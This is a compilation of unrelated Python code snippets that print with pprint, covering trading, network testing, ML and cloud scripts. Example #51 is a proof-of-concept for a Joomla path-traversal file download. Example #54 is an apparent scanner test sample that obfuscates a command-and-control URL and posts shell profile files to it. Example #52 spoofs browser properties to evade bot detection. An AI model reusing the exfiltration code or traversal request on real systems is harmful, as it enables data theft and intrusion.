    pprint(position)

    current_orders = await exchange.fetch_current_orders(pair="ETHUSDT")
    print("\n")
    print("Current Orders:")
    pprint(current_orders)

    account = await exchange.fetch_total_balance("USDT")
    print("\n")
    print("Balance:")
    pprint(account)

    last_price = await exchange.fetch_last_price("ETHUSDT")
    print("\n")
    print("Last Price: ", last_price)

    order_book_ticker = await exchange.fetch_order_book_ticker("ETHUSDT")
    print("\n")
    print("Order Book Ticker:")
    pprint(order_book_ticker)

    candles = await exchange.fetch_candles("ETHUSDT", period="1m")
    print("\n")
    print("Candles:")
    print(len(candles))
    pprint(candles)

    await exchange.cancel_current_orders("ETHUSDT")
    await exchange.place_order(
        pair="ETHUSDT",
        order_type=OrderType.limit,
        side=-1,
        qty=0.001,
        price=500,
    )
    await exchange.place_order(
        pair="ETHUSDT",
        order_type=OrderType.limit,
        side=1,
        qty=0.001,
        price=100,
    )
    await exchange.place_order(
        pair="ETHUSDT",
        order_type=OrderType.trigger,
        side=1,
        qty=0.001,
        price=600,
    )

    await exchange.place_orders_batch([
        dict(
            pair="ETHUSDT",
            order_type=OrderType.limit,
            side=-1,
            qty=0.001,
            price=500,
        ),
        dict(
            pair="ETHUSDT",
            order_type=OrderType.limit,
            side=1,
            qty=0.001,
            price=100,
        ),
        dict(
            pair="ETHUSDT",
            order_type=OrderType.trigger,
            side=1,
            qty=0.001,
            price=500,
        ),
    ])

    await exchange.close()
Example #39
0
 def _inner(environ, start_fn):
     pprint.pprint(environ)
     return handler(environ, start_fn)
Example #40
0
def Spirent_MAC_Transperancy_Traffic_Testing_For_EVPN_Service():
    Booked_ports, Interface_config, Stream_config, Spirent_Test_Infra, Stream_Name = get_spirent_data(
    )
    Number_of_ports = Spirent_Test_Infra['Number_of_ports']
    Number_of_streams_per_Port = Spirent_Test_Infra[
        'Number_of_streams_per_Port']
    Total_Number_of_stream = Spirent_Test_Infra['Total_Number_of_stream']
    Initial_MAC_address = Spirent_Test_Infra['Initial_MAC_address']

    ##############################################################
    # Creation of Spirent Test config with log file
    ##############################################################

    test_sta = sth.test_config(
        log='1',
        logfile='SteamConfig-WithPercentageTraffic_logfile',
        vendorlogfile='SteamConfig-WithPercentageTraffic_stcExport',
        vendorlog='1',
        hltlog='1',
        hltlogfile='SteamConfig-WithPercentageTraffic_hltExport',
        hlt2stcmappingfile='SteamConfig-WithPercentageTraffic_hlt2StcMapping',
        hlt2stcmapping='1',
        log_level='7')

    status = test_sta['status']
    if (status == '0'):
        print("run sth.test_config failed")

    ##############################################################
    # config the parameters for optimization and parsing
    ##############################################################

    test_ctrl_sta = sth.test_control(action='enable')

    status = test_ctrl_sta['status']
    if (status == '0'):
        print("run sth.test_control failed")

    ##############################################################
    # connect to chassis and reserve port list
    ##############################################################
    i = 0
    device = "10.91.113.124"
    port_list = list(Booked_ports.values())
    Streams = list(Stream_Name.values())
    port_handle = []
    intStatus = sth.connect(device=device,
                            port_list=port_list,
                            break_locks=1,
                            offline=0)

    status = intStatus['status']

    if (status == '1'):
        for port in port_list:
            port_handle.append(intStatus['port_handle'][device][port])
            i += 1
    else:
        print("\nFailed to retrieve port handle!\n")
    #		print(port_handle)
    print(port_handle)
    ##############################################################
    # Spirent Ports configuration
    ##############################################################
    for i in range(len(port_list)):
        int_ret0 = sth.interface_config(mode='config',
                                        port_handle=port_handle[i],
                                        create_host='false',
                                        intf_mode='ethernet',
                                        phy_mode='fiber',
                                        scheduling_mode='RATE_BASED',
                                        port_loadunit='PERCENT_LINE_RATE',
                                        port_load='50',
                                        enable_ping_response='0',
                                        control_plane_mtu='1500',
                                        flow_control='false',
                                        speed='ether1000',
                                        data_path_mode='normal',
                                        autonegotiation='1')
        status = int_ret0['status']
        if (status == '0'):
            print("run sth.interface_config failed")
    # print(int_ret0)
    ##############################################################
    # create traffic
    ##############################################################
    streamblock_ret1 = sth.traffic_config(
        mode='create',
        port_handle=port_handle[0],
        l2_encap='ethernet_ii',
        l3_protocol='ipv4',
        ip_id='0',
        ip_src_addr='192.85.1.2',
        ip_dst_addr='192.0.0.1',
        ip_ttl='255',
        ip_hdr_length='5',
        ip_protocol='253',
        ip_fragment_offset='0',
        ip_mbz='0',
        ip_precedence='0',
        ip_tos_field='0',
        mac_dst_mode='increment',
        mac_dst_repeat_count='0',
        mac_dst_count='50',
        mac_src_count='50',
        mac_src_mode='increment',
        mac_src_repeat_count='0',
        mac_src='00:10:94:00:00:02',
        mac_dst='00:00:01:00:00:01',
        enable_control_plane='0',
        l3_length='4982',
        name='StreamBlock_11',
        fill_type='constant',
        fcs_error='0',
        fill_value='0',
        frame_size='2000',
        traffic_state='1',
        high_speed_result_analysis='1',
        length_mode='fixed',
        dest_port_list=port_handle[1],
        tx_port_sending_traffic_to_self_en='false',
        disable_signature='0',
        enable_stream_only_gen='1',
        pkts_per_burst='1',
        inter_stream_gap_unit='bytes',
        burst_loop_count='6000',
        transmit_mode='continuous',
        inter_stream_gap='12',
        rate_mbps='800',
        mac_discovery_gw='192.85.1.1',
        enable_stream='false')

    status = streamblock_ret1['status']
    if (status == '0'):
        print("run sth.traffic_config failed")
        print(streamblock_ret1)
    else:
        print("***** run sth.traffic_config successfully")

    streamblock_ret2 = sth.traffic_config(
        mode='create',
        port_handle=port_handle[1],
        l2_encap='ethernet_ii',
        l3_protocol='ipv4',
        ip_id='0',
        ip_src_addr='192.85.1.2',
        ip_dst_addr='192.0.0.1',
        ip_ttl='255',
        ip_hdr_length='5',
        ip_protocol='253',
        ip_fragment_offset='0',
        ip_mbz='0',
        ip_precedence='0',
        ip_tos_field='0',
        mac_dst_mode='increment',
        mac_dst_repeat_count='0',
        mac_dst_count='50',
        mac_src_count='50',
        mac_src_mode='increment',
        mac_src_repeat_count='0',
        mac_src='00:00:01:00:00:01',
        mac_dst='00:10:94:00:00:02',
        enable_control_plane='0',
        l3_length='4982',
        name='StreamBlock_12',
        fill_type='constant',
        fcs_error='0',
        fill_value='0',
        frame_size='5000',
        traffic_state='1',
        high_speed_result_analysis='1',
        length_mode='fixed',
        dest_port_list=port_handle[0],
        tx_port_sending_traffic_to_self_en='false',
        disable_signature='0',
        enable_stream_only_gen='1',
        pkts_per_burst='1',
        inter_stream_gap_unit='bytes',
        burst_loop_count='6000',
        transmit_mode='continuous',
        inter_stream_gap='12',
        rate_mbps='800',
        mac_discovery_gw='192.85.1.1',
        enable_stream='false')

    status = streamblock_ret2['status']
    if (status == '0'):
        print("run sth.traffic_config failed")
        print(streamblock_ret2)
    else:
        print("***** run sth.traffic_config successfully")

    # config part is finished
    #############################################################
    # start traffic
    ##############################################################
    print("Traffic Started First Time")
    traffic_ctrl_ret = sth.traffic_control(
        port_handle=[port_handle[0], port_handle[1]],
        action='run',
        duration='30')
    time.sleep(60)
    print("After Aging Timer")
    traffic_ctrl_ret = sth.traffic_control(
        port_handle=[port_handle[0], port_handle[1]], action='clear_stats')
    print("Delay before Second Traffic Started Second Time")
    time.sleep(60)
    print("Traffic Started Second Time")
    traffic_ctrl_ret = sth.traffic_control(
        port_handle=[port_handle[0], port_handle[1]],
        action='run',
        duration='10')
    status = traffic_ctrl_ret['status']
    if (status == '0'):
        print("run sth.traffic_control failed")
    # print(traffic_ctrl_ret)
    print("Test Traffic Stopped now adding delay before collecting stats")
    time.sleep(70)
    print("Traffic collection started")
    ##############################################################
    # start to get the traffic results
    ##############################################################
    traffic_results_ret = sth.traffic_stats(
        port_handle=[port_handle[0], port_handle[1]], mode='all')
    print("Traffic collection stopped")
    status = traffic_results_ret['status']
    if (status == '0'):
        print("run sth.traffic_stats failed")
    pprint(traffic_results_ret)
    cleanup_sta = sth.cleanup_session(
        port_handle=[port_handle[0], port_handle[1]], clean_dbfile='1')
    print("Port Cleanedup")
    ##############################################################
    # Get required values from Stats
    ##############################################################

    traffic_result = str(traffic_results_ret)

    # regex to get rx, tx and streams from traffic_results_ret
    RX = '(streamblock\d+)\S+\s+\S+(rx)\S+\s+\S+total_pkt_bytes\S+\s+\S(\d+)'
    TX = '(streamblock\d+).*?(tx)\S+\s+\S+total_pkt_bytes\S+\s+\S(\d+)'

    StreamBlock = 'streamblock\d+'

    print('Spirent Ports= ' + str(port_list) + '\nTotal Ports= ' +
          str(len(port_list)))
    PortStatus = 'Spirent Ports= ' + str(port_list) + '\nTotal Ports= ' + str(
        len(port_list))
    StreamBlock = re.findall(StreamBlock, traffic_result)
    print('Stream Configured= ' + str(StreamBlock) + '\nTotal Streams= ' +
          str(len(StreamBlock)))
    StreamStatus = 'Stream Configured= ' + str(
        StreamBlock) + '\nTotal Streams= ' + str(len(StreamBlock))
    rx_stats = re.findall(RX, traffic_result)
    tx_stats = re.findall(TX, traffic_result)

    print('rx_stats= ' + str(rx_stats))
    print('tx_stats= ' + str(tx_stats))

    stats = 'rx_stats= ' + str(rx_stats) + '\ntx_stats= ' + str(tx_stats)

    StreamResult = []

    for i in range(0, len(StreamBlock)):
        if rx_stats[i][2] == tx_stats[i][2]:
            print(str(rx_stats[i][0] + ' = pass'))
            StreamResult.append('pass')

        else:
            print(str(rx_stats[i][0] + ' = fail'))
            StreamResult.append('fail')

    print(str(StreamResult))

    OverallStatus = '\n' + PortStatus + '\n' + StreamStatus + '\n' + stats + '\n' + str(
        StreamResult)
    # print(OverallStatus)

    return OverallStatus
Example #41
0
def test_rcnn_dota_quadrangle(cfg, dataset, image_set, root_path, dataset_path,
              ctx, prefix, epoch,
              vis, ignore_cache, shuffle, has_rpn, proposal, thresh, logger=None, output_path=None):
    if not logger:
        assert False, 'require a logger'

    # print cfg
    pprint.pprint(cfg)
    logger.info('testing cfg:{}\n'.format(pprint.pformat(cfg)))

    # load symbol and testing data
    if has_rpn:
        sym_instance = eval(cfg.symbol + '.' + cfg.symbol)()
        sym = sym_instance.get_symbol(cfg, is_train=False)
        imdb = eval(dataset)(image_set, root_path, dataset_path, result_path=output_path)
        roidb = imdb.gt_roidb()
    else:
        sym_instance = eval(cfg.symbol + '.' + cfg.symbol)()
        sym = sym_instance.get_symbol_rcnn(cfg, is_train=False)
        imdb = eval(dataset)(image_set, root_path, dataset_path, result_path=output_path)
        gt_roidb = imdb.gt_roidb()
        roidb = eval('imdb.' + proposal + '_roidb')(gt_roidb)

    if cfg.TEST.DO_MULTISCALE_TEST:
        print "multiscale test!"
        multiscales = np.array(cfg.TEST.MULTISCALE)
        original_scales = cfg.SCALES
        for scale in multiscales:
            print "scale: {}".format(scale)
            cfg.SCALES[0] = (int(original_scales[0][0] * scale), int(original_scales[0][1] * scale))
            # get test data iter
            test_data = QuadrangleTestLoader(roidb, cfg, batch_size=len(ctx), shuffle=shuffle, has_rpn=has_rpn)

            # load model
            arg_params, aux_params = load_param(prefix, epoch, process=True)

            # infer shape
            data_shape_dict = dict(test_data.provide_data_single)
            sym_instance.infer_shape(data_shape_dict)

            sym_instance.check_parameter_shapes(arg_params, aux_params, data_shape_dict, is_train=False)

            # decide maximum shape
            data_names = [k[0] for k in test_data.provide_data_single]
            label_names = None
            max_data_shape = [[('data', (1, 3, max([v[0] for v in cfg.SCALES]), max([v[1] for v in cfg.SCALES])))]]
            if not has_rpn:
                max_data_shape.append(('rois', (cfg.TEST.PROPOSAL_POST_NMS_TOP_N + 30, 5)))

            # create predictor
            predictor = Predictor(sym, data_names, label_names,
                                  context=ctx, max_data_shapes=max_data_shape,
                                  provide_data=test_data.provide_data, provide_label=test_data.provide_label,
                                  arg_params=arg_params, aux_params=aux_params)

            # start detection
            pred_eval_quadrangle_multiscale(scale, predictor, test_data, imdb, cfg, vis=vis, draw=True, ignore_cache=ignore_cache,
                                 thresh=thresh, logger=logger)
        # merge all different test scale results to one file
        merge_dets_to_one_file(imdb.result_path, multiscales)
        # do polygon nms then in evaluation script

    else:
        # get test data iter
        test_data = QuadrangleTestLoader(roidb, cfg, batch_size=len(ctx), shuffle=shuffle, has_rpn=has_rpn)

        # load model
        arg_params, aux_params = load_param(prefix, epoch, process=True)

        # infer shape
        data_shape_dict = dict(test_data.provide_data_single)
        sym_instance.infer_shape(data_shape_dict)

        sym_instance.check_parameter_shapes(arg_params, aux_params, data_shape_dict, is_train=False)

        # decide maximum shape
        data_names = [k[0] for k in test_data.provide_data_single]
        label_names = None
        max_data_shape = [[('data', (1, 3, max([v[0] for v in cfg.SCALES]), max([v[1] for v in cfg.SCALES])))]]
        if not has_rpn:
            max_data_shape.append(('rois', (cfg.TEST.PROPOSAL_POST_NMS_TOP_N + 30, 5)))

        # create predictor
        predictor = Predictor(sym, data_names, label_names,
                              context=ctx, max_data_shapes=max_data_shape,
                              provide_data=test_data.provide_data, provide_label=test_data.provide_label,
                              arg_params=arg_params, aux_params=aux_params)

        # start detection
        pred_eval_dota_quadrangle(predictor, test_data, imdb, cfg, vis=False, draw=False, ignore_cache=ignore_cache,
                             thresh=thresh, logger=logger)
Example #42
0
 def __init__(self, *args, **kwargs):
     super().__init__(*args, **kwargs)
     from pprint import pprint
     pprint('titleform init')
Example #43
0
            52500,
            "is_oem":
            True,
            "repair": {
                "repair_difficulty": 2,
                "repair_hours": 0.0,
                "labor_rate_per_hour": 106.38,
                "part_cost": 6.15,
                "labor_cost": 0.0,
                "misc_cost": 0.0,
                "total_cost": 6.15
            },
            "parts": [{
                "desc": "Engine Oil",
                "manufacturer": "",
                "price": "6.15",
                "qty": "1"
            }]
        }, {'a'}]
    }
    test_list = [
        'ira', 'nanna', 'ghost', [1, 2, 3], {'a', 'b', 'c'}, ('do', 're', 'mi')
    ]
    user_input = str(test_list)
    # print(user_input, l2test)
    # print(gen.__name__)
    pprint(json_ast(user_input))
    _grapher(graph, json_ast(user_input))
    if graph.write_png('dtree.png'):
        print("Graph made successfully.")
Example #44
0
    args = parser.parse_args()

    address = (args.host, args.p)
    protocol = lookup('PROTOCOL_', args.P)

    context = ssl.SSLContext(protocol)
    context.set_ciphers(args.C)
    context.check_hostname = False
    if (args.s is not None) and (args.c is not None):
        parser.error('you cannot specify both -c and -s')
    elif args.s is not None:
        context.verify_mode = ssl.CERT_OPTIONAL
        purpose = ssl.Purpose.CLIENT_AUTH
        context.load_cert_chain(args.s)
    else:
        context.verify_mode = ssl.CERT_REQUIRED
        purpose = ssl.Purpose.SERVER_AUTH
        if args.c is not None:
            context.load_cert_chain(args.c)
    if args.a is None:
        context.load_default_certs(purpose)
    else:
        context.load_verify_locations(args.a)

    print()
    ssl_sock = open_tls(context, address, args.s)
    cert = describe(ssl_sock, args.host, args.s, args.d)
    print()
    if args.v:
        pprint(cert)
Example #45
0
def trainval(exp_dict, savedir_base, datadir, reset=False, metrics_flag=True):
    # bookkeeping
    # ---------------

    # get experiment directory
    exp_id = hu.hash_dict(exp_dict)
    savedir = os.path.join(savedir_base, exp_id)

    if reset:
        # delete and backup experiment
        hc.delete_experiment(savedir, backup_flag=True)
    
    # create folder and save the experiment dictionary
    os.makedirs(savedir, exist_ok=True)
    hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
    pprint.pprint(exp_dict)
    print('Experiment saved in %s' % savedir)
    
    # set seed
    # ---------------
    seed = 42 + exp_dict['runs']
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)

    # Dataset
    # -----------

    # Load Train Dataset
    train_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
                                     train_flag=True,
                                     datadir=datadir,
                                     exp_dict=exp_dict)

    train_loader = torch.utils.data.DataLoader(train_set,
                              drop_last=True,
                              shuffle=True,
                              batch_size=exp_dict["batch_size"])

    # Load Val Dataset
    val_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
                                   train_flag=False,
                                   datadir=datadir,
                                   exp_dict=exp_dict)


    # Model
    # -----------
    model = models.get_model(exp_dict["model"],
                             train_set=train_set).cuda()
    # Choose loss and metric function
    loss_function = metrics.get_metric_function(exp_dict["loss_func"])

    # Load Optimizer
    n_batches_per_epoch = len(train_set)/float(exp_dict["batch_size"])
    opt = optimizers.get_optimizer(opt=exp_dict["opt"],
                                   params=model.parameters(),
                                   n_batches_per_epoch =n_batches_per_epoch)

    # Checkpoint
    # -----------
    model_path = os.path.join(savedir, 'model.pth')
    score_list_path = os.path.join(savedir, 'score_list.pkl')
    opt_path = os.path.join(savedir, 'opt_state_dict.pth')

    if os.path.exists(score_list_path):
        # resume experiment
        score_list = hu.load_pkl(score_list_path)
        model.load_state_dict(torch.load(model_path))
        opt.load_state_dict(torch.load(opt_path))
        s_epoch = score_list[-1]['epoch'] + 1
    else:
        # restart experiment
        score_list = []
        s_epoch = 0

    # Train & Val
    # ------------
    print('Starting experiment at epoch %d/%d' % (s_epoch, exp_dict['max_epoch']))

    for epoch in range(s_epoch, exp_dict['max_epoch']):
        # Set seed
        np.random.seed(exp_dict['runs']+epoch)
        torch.manual_seed(exp_dict['runs']+epoch)
        torch.cuda.manual_seed_all(exp_dict['runs']+epoch)

        score_dict = {"epoch": epoch}

        if metrics_flag:
            # 1. Compute train loss over train set
            score_dict["train_loss"] = metrics.compute_metric_on_dataset(model, train_set,
                                                metric_name=exp_dict["loss_func"])

            # 2. Compute val acc over val set
            score_dict["val_acc"] = metrics.compute_metric_on_dataset(model, val_set,
                                                        metric_name=exp_dict["acc_func"])

        # 3. Train over train loader
        model.train()
        print("%d - Training model with %s..." % (epoch, exp_dict["loss_func"]))

        s_time = time.time()
        for images,labels in tqdm.tqdm(train_loader):
            images, labels = images.cuda(), labels.cuda()

            opt.zero_grad()

            if exp_dict["opt"]["name"] in exp_configs.ours_opt_list + ["l4"]:
                closure = lambda backwards: loss_function(model, images, labels, backwards=backwards)
                opt.step(closure)

            else:
                loss = loss_function(model, images, labels)
                loss.backward()
                opt.step()

        e_time = time.time()

        # Record metrics
        score_dict["step_size"] = opt.state["step_size"]
        score_dict["n_forwards"] = opt.state["n_forwards"]
        score_dict["n_backwards"] = opt.state["n_backwards"]
        score_dict["batch_size"] =  train_loader.batch_size
        score_dict["train_epoch_time"] = e_time - s_time

        score_list += [score_dict]

        # Report and save
        print(pd.DataFrame(score_list).tail())
        hu.save_pkl(score_list_path, score_list)
        hu.torch_save(model_path, model.state_dict())
        hu.torch_save(opt_path, opt.state_dict())
        print("Saved: %s" % savedir)

    print('Experiment completed')
Example #46
0
    save_player("Dr.WeeD", "4242")
    save_player("Dr.WeeD2", "4242")
    save_player("Dr.WeeD3", "4242")
    save_player("Dr.WeeD4", "4242")
    save_player("Dr.WeeD5", "4242")
    save_player("Dr.WeeD6", "4242")
    save_player("test", "76561197984877751")
    save_start_player_session("4242", datetime.datetime.now().timestamp())
    save_end_player_session(
        "4242",
        int(
            (datetime.datetime.now() + datetime.timedelta(minutes=30)).timestamp()
            * 1000
        ),
    )
    save_end_player_session(
        "4242",
        int(
            (datetime.datetime.now() + datetime.timedelta(minutes=30)).timestamp()
            * 1000
        ),
    )
    add_player_to_blacklist("4242", "test")
    remove_player_from_blacklist("4242")

    import pprint

    pprint.pprint(get_players_by_appearance())

    add_flag_to_player("76561198156263725", "🐷")
Example #47
0
# Add a Data Center
datacenter_added = oneview_client.datacenters.add(datacenter_information)
print('Added Data Center {name} successfully\n'.format(**datacenter_added))

# Retrieve Data Center by URI
datacenter = oneview_client.datacenters.get(datacenter_added['uri'])
print('Get Data Center by URI: retrieved {name} successfully\n'.format(**datacenter))

# Update the Data Center
datacenter['name'] = "New Data Center Name"
datacenter = oneview_client.datacenters.update(datacenter)
print('Data Center {name} updated successfully\n'.format(**datacenter))

# Get the Data Center by name
datacenter_list = oneview_client.datacenters.get_by('name', "New Data Center Name")
print('Get Data Center device by name: {name}\n'.format(**datacenter))

# Get the Data Center visual content
print("Getting the Data Center visual content...")
datacenter_visual_content = oneview_client.datacenters.get_visual_content(datacenter['uri'])
pprint(datacenter_visual_content)

# Remove added Data Center
oneview_client.datacenters.remove(datacenter)
print("\nSuccessfully removed the data center")

# Add a data center again and call Remove All
datacenter_added = oneview_client.datacenters.add(datacenter_information)
oneview_client.datacenters.remove_all(filter="name matches '%'")
print("\nSuccessfully removed all data centers")
Example #48
0
 def _dump_state(self):
     print('---- type variables ----')
     pprint([v for k, v in sorted(self.typeinfer.typevars.items())])
Example #49
0
            }

        retDict = {
            'content': res,
            'links': {},
            "response_status": res.status_code,
        }
        # Find and follow all the links
        links = regexes.RE_LINK.findall(res.text)
        linksSet = self.get_valid_links(links)

        # for links upto maxLinks, crawl recursivly
        for link in linksSet:
            # Get the absolute URL
            link = urllib.parse.urljoin(url, link)
            retDict['links'][link] = self._crawl_wrapper(
                link, maxLevel - 1, **kwargs)

        return retDict


class URLOnlyCrawler(linkvalidators.URLOnlyValidator, BaseCrawler):
    """Only crawls URL and not inside files, etc."""

    pass


if __name__ == '__main__':
    url = sys.argv[1:2][0]
    pprint(BaseCrawler().crawl(url, 2))
Example #50
0
           'platform': 'vIOS'}

access4 = {'hostname': 'Access4',
                             'interfaces': {'gig0/0': {'allowed_vlans': '1,10,20,30,40,50,60,70',
                                                       'encapsulation': 'dot1q',
                                                       'mode': 'trunk',
                                                       'state': 'no shutdown'},
                                            'gig0/1': {'allowed_vlans': '1,10,20,30,40,50,60,70',
                                                       'encapsulation': 'dot1q',
                                                       'mode': 'trunk',
                                                       'state': 'no shutdown'},
                                            'gig0/3': {'mode': 'access',
                                                       'state': 'no shutdown',
                                                       'vlan': 30}},
                             'layer': 'access',
                             'mgmt_intf': 'vlan 10',
                             'mgmt_ip': '10.10.0.8',
                             'mgmt_subnet': '255.255.255.0',
                             'platform': 'vIOS'}

all_devices = [core1, core2, distro1, distro2, access1, access2, access3, access4]

core = [core1, core2]

distro = [distro1, distro2]

access = [access1, access2, access3, access4]

for device in all_devices:
    pprint(device)
Example #51
0
                    file=[../../index.php] 其中file参数未做正确过滤限制,导致可下载任意文件
                    ''',
            'references': [
                'https://www.bugscan.net/#!/x/22738',
            ],
        },
    }

    @classmethod
    def verify(cls, args):
        verify_url = args['options'][
            'target'] + "/index.php?option=com_jetext&task=download&file=../../index.php"
        if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
        request = urllib2.Request(verify_url)
        response = urllib2.urlopen(request)
        content = response.read()
        if 'Id: index.php' in content:
            args['success'] = True
            args['poc_ret']['vul_url'] = verify_url
        return args

    exploit = verify


if __name__ == "__main__":
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())
Example #52
0
    # 给 webdriver.Chrome 添加一个名为 add_script 的方法
    webdriver.Chrome.add_script = add_script # 这里(webdriver.Chrome)可能需要改,当调用不同的驱动时
    # *************** 专业造假 ###################

    browser = webdriver.Chrome(
        executable_path=driver_path,
        chrome_options=options
    )

    # ################## 辅助调试 *********************
    existed = {
        'executor_url': browser.command_executor._url,  # 浏览器可被远程连接调用的地址
        'session_id': browser.session_id  # 浏览器会话ID
    }
    pprint(existed)
    with open('existed.json', 'wt', encoding='utf-8') as f:
        json.dump(existed, f, ensure_ascii=False, indent=4)
    # ********************* 辅助调试 ##################

    # ############### 专业造假 ***************************
    browser.add_script("""
    Object.defineProperty(navigator, 'webdriver', {
        get: () => false,
    });
    window.navigator.chrome = {
        runtime: {},
    };
    Object.defineProperty(navigator, 'languages', {
        get: () => ['zh-CN', 'zh']
    });
Example #53
0
    all_deployments = []
    response = apiGatewayClient.get_rest_apis()
    deployments = map(lambda i: get_deployments_for_api(i['id']),
                      response['items'])
    for d in deployments:
        all_deployments.extend(d)
    return all_deployments

def get_deployments_for_api(restApiId):
    response = apiGatewayClient.get_deployments(restApiId=restApiId)
    return response['items']

response = apiGatewayClient.get_rest_apis()
print('Existing deployments:')
for deployment in get_deployments():
    pprint.pprint(deployment)

instances = []
response = ec2Client.describe_instances()
print('Existing instances:')
for reservation in response['Reservations']:
    for instance in reservation['Instances']:
        instances.append(instance)

for i in instances:
    pprint.pprint(i)

myInstances = ec2Resource.instances.all()
for instance in myInstances:
    pprint.pprint(instance)
Example #54
0
from .. import relative

from requests import post  # Import only function from a module
# Simple obfuscation of URL
url = 'aHR0cDovL21hbHd' + 'hcmUuY29tL0NuQw==\n'

blah = open  # Rename builtin function

d = {
    'func': blah
}

somefile = d['func']('~/.profile')

payload = somefile.read()

test_url = "https://example.com/index.html"

with blah('~/.bash_rc') as fd:
    # Local context sensitive
    post(url.decode('base64'), body=fd.read())

# This statement works only in Python 2; can't be parsed in Python 3
print "test"

cpx = 12 + 3j # complex number

fabulous.pprint("adalaraoawa aoalalaeaH"[::-2])  # String "Hello world" after slicing

eval("print('$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!')")
with open('hyperparams/{}.yml'.format(args.algo), 'r') as f:
    hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader)[BASE_ENV]

hyperparams['seed'] = args.seed
# Sort hyperparams that will be saved
saved_hyperparams = OrderedDict([(key, hyperparams[key])
                                 for key in sorted(hyperparams.keys())])
# save vae path
saved_hyperparams['vae_path'] = args.vae_path
if vae is not None:
    saved_hyperparams['z_size'] = vae.z_size

# Save simulation params
for key in SIM_PARAMS:
    saved_hyperparams[key] = eval(key)
pprint(saved_hyperparams)

# Compute and create log path
log_path = os.path.join(args.log_folder, args.algo)
save_path = os.path.join(
    log_path, "{}_{}".format(ENV_ID,
                             get_latest_run_id(log_path, ENV_ID) + 1))
params_path = os.path.join(save_path, ENV_ID)
os.makedirs(params_path, exist_ok=True)

# Create learning rate schedules for ppo2 and sac
if args.algo in ["ppo2", "sac", 'sac2']:
    for key in ['learning_rate', 'cliprange']:
        if key not in hyperparams:
            continue
        if isinstance(hyperparams[key], str):
Example #56
0
def metrics(clusters,
            thresh,
            t_ref,
            t_cen,
            t_exp,
            ignore=[0],
            estimates='roct'):
    ''' This function runs all the metrics calculations and sums them
    
    Parameters
    -----------------------------------------
    clusters : A dictionary of the clusters.  The keys are the cluster
        numbers.  The values are numpy structured arrays with fields
        'times', 'waveforms', and 'pca' which give the timestamp,
        tetrode waveform, and pca reduced values, respectively, for each
        spike in the cluster.  Get this from load_spikes() or from 
        ePhys.Sorter.clusters.
    thresh : detection threshold used for spike sorting
    t_ref : the width of the refractory period, in seconds
    t_cen : the width of the censored period, in seconds
    t_exp : the total length of the experiment, in seconds
    ignore : a list of the clusters to ignore in the analysis.  Default is cluster
        zero since that is typically the noise cluster.
    estimates : a string of estimates to include
        'r' for refractory
        'o' for overlap
        'c' for censored
        't' for thresholding
        So 'roct' does them all, 'ro' only does refractory and censored,
            'ct' does consored and thresholding, and so on.
    
    Returns
    -----------------------------------------
    f_p : dictionary of false positive estimates for each cluster
        if an estimate can't be made, will be NaN.  This means that the 
        estimate is >50%
    f_n : dictionary of false negative estimates for each cluster
    
    '''
    import pprint as pp  # Pretty print!
    from collections import defaultdict
    all_estimates = 'roct'
    false_pos_est = {est: defaultdict(int) for est in all_estimates}
    false_neg_est = {est: defaultdict(int) for est in all_estimates}

    if 'r' in estimates:
        f_p_r = refractory(clusters, t_ref, t_cen, t_exp)
        print "Refractory violation false positive estimate:"
        pp.pprint(f_p_r)
        false_pos_est.update({'r': f_p_r})
    if 't' in estimates:
        f_n_t = threshold(clusters, thresh)
        print "Thresholding false negatives estimate:"
        pp.pprint(f_n_t)
        false_neg_est.update({'t': f_n_t})
    if 'o' in estimates:
        f_p_o, f_n_o = overlap(clusters, ignore)
        print "Overlap false positives and negatives estimate:"
        pp.pprint(f_p_o)
        pp.pprint(f_n_o)
        false_pos_est.update({'o': f_p_o})
        false_neg_est.update({'o': f_n_o})
    if 'c' in estimates:
        f_n_c = censored(clusters, t_cen, t_exp)
        print "Censored false negatives estimate:"
        pp.pprint(f_n_c)
        false_neg_est.update({'c': f_n_c})

    f_p = dict.fromkeys(clusters.keys())
    f_n = dict.fromkeys(clusters.keys())
    for cid in clusters.iterkeys():
        if np.isnan(false_pos_est['r'][cid]):
            f_p[cid] = np.nan
        else:
            f_p[cid] = np.sum([false_pos_est[est][cid] for est in estimates])

        if false_neg_est['o'][cid] == None:
            f_n[cid] = np.nan
        else:
            f_n[cid] = np.sum([false_neg_est[est][cid] for est in estimates])

    print "Summing everything up"
    return f_p, f_n
Example #57
0
    <snipped for brevity>
    ...
    ('Internet  10.220.88.1           135   0062.ec29.70fe  ARPA   FastEthernet4\n'
     
     'Internet  10.220.88.20            -   c89c.1dea.0eb6  ARPA   FastEthernet4\n'
    
     'Internet  10.220.88.21          213   1c6a.7aaf.576c  ARPA   FastEthernet4\n')
"""
from pprint import pprint 

# import the file `show_arp.txt`, convert to a list, remove the header 
with open("show_arp.txt") as f:
   output = f.readlines()

arp_list = output[1:]
pprint(arp_list)

# sort based on IPs 
pprint(arp_list.sort())

# create a new list containing the first 3 ARP entries
arp_sliced = arp_list[:3]
pprint(arp_sliced)

# join the new list 
arp_sliced = '\n'.join(arp_sliced)
pprint(arp_sliced)

# write the list out to a file 
with open("arp_entries.txt", "w") as f:
    f.write(arp_sliced)
Example #58
0
 def describe(self):
     pprint.pprint(self.__dict__)
Example #59
0
db.authenticate(name="root", password="******")
qr = pyquery.query(db, "test.coll001")
qr = qr.where(pyfuncs.regex(Fields.fx, "^312313$"))

# qr.project({
#     Fields.Users.username:1,
#     Fields.Users.fullName:pyfuncs.concat(Fields.Users.firstName, " ",Fields.Users.lastname)
# })

# qr=qr+2
#     #.set(x=1,y=2)
# import pprint
# items=list(qr.objects)
import pprint
x = list(qr.objects)
pprint.pprint(list(qr.items))

# ret=qr=pyquery.query(db,"test.coll001").insert(dict(
#     name=1
# ),dict(
#     fx="312313"
# )).commit()
# print ret
# qr=pyquery.query(db,"test").lookup(
#     From="ddd",
#     locaField="vvv",
#     foriegbField="ggg",
#     alias="ggg"
#
# ).lookup(
#     From="bbb",
Example #60
0
def make_pipeline():
    # complete the aggregation pipeline
    pipeline = [{
        "$group": {
            "_id": "$source",
            "count": {
                "$sum": 1
            }
        }
